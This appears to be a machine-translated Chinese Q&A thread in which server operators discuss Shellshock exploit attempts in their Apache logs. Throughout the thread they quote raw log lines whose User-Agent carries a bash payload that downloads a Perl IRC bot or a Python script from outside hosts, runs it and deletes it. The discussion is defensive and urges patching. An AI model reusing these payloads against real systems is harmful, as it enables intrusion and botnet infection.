bash shellshock jurat Perl脚本

时间:2014-09-27 20:58:43

标签: bash shellshock-bash-bug

我在/var/log/apache2/access_log下看到了以下一行:

"GET /cgi-bin/hi HTTP/1.0" 404 357 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

我还没有去打补丁。我马上关机了。

有没有人在他们的日志上看到这个和/或检查了http://213.5.67.223/jurat处找到的Perl脚本?这似乎相当温和,但我想知道我应该多么担心?

在第338行,您可以看到shell函数执行从IRC频道另一端的某人处获取的shell命令

my @resp=`$comando 2>&1 3>&1`;

使用与apache服务器相同的用户级别执行此操作。我只是希望他们无法升级特权。

3 个答案:

答案 0 :(得分:2)

我没有看过细节,但对我来说看起来并不温和:

sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds.");

这看起来像某种僵尸网络脚本。害怕。获得补丁,人们。

更新:分析in this blog

  

如果脚本成功执行,则受感染的主机将连接到脚本中硬编码的IRC频道并等待命令。"

那比Baddy McBad更糟糕。

答案 1 :(得分:1)

我的access_log中有这样的行,但有些略有不同:

""() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""

=> 现在您可以下载它,您将获得vilain perl脚本: http://pastie.org/9604492

另一个IRC bot漏洞的好例子:) 希望有所帮助

答案 2 :(得分:1)

请参阅类似主题的链接:https://superuser.com/questions/818257/is-this-an-attack-or-something-to-be-concerned-about-shellshock

这是一个脚本小子尝试利用bash漏洞执行基于perl脚本的IRC bot。如果您有 bash更新,此外,如果您像我一样在 chroot 下运行apache,则无需担心。我在日志中看到了几个版本(见下文)至少每隔一天从9/27开始...这只是一个噪音。

12.64.2d.static.xlhost.com - - [27/Sep/2014:12:36:34 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""        
12.64.2d.static.xlhost.com - - [29/Sep/2014:00:39:41 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""        
web21.qna.vengit.com - - [01/Oct/2014:04:52:24 -0500] "GET /cgi-bin/hi HTTP/1.0" 404 1023 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""

我今天刚刚注意到的另一种脚本(python脚本)执行尝试...注意:下载python脚本的google-traffic-analytics.com当然与Google无关。

cm232.delta210.maxonline.com.sg - - [04/Oct/2014:01:45:38 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
localhost - - [04/Oct/2014:01:45:41 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
169.118.103.218.static.netvigator.com - - [04/Oct/2014:01:45:45 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
mm-2-192-57-86.dynamic.pppoe.mgts.by - - [04/Oct/2014:01:45:52 -0500] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1193 "http://xxxx.xxx/cgi-sys/entropysearch.cgi" "() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\""
相关问题
最新问题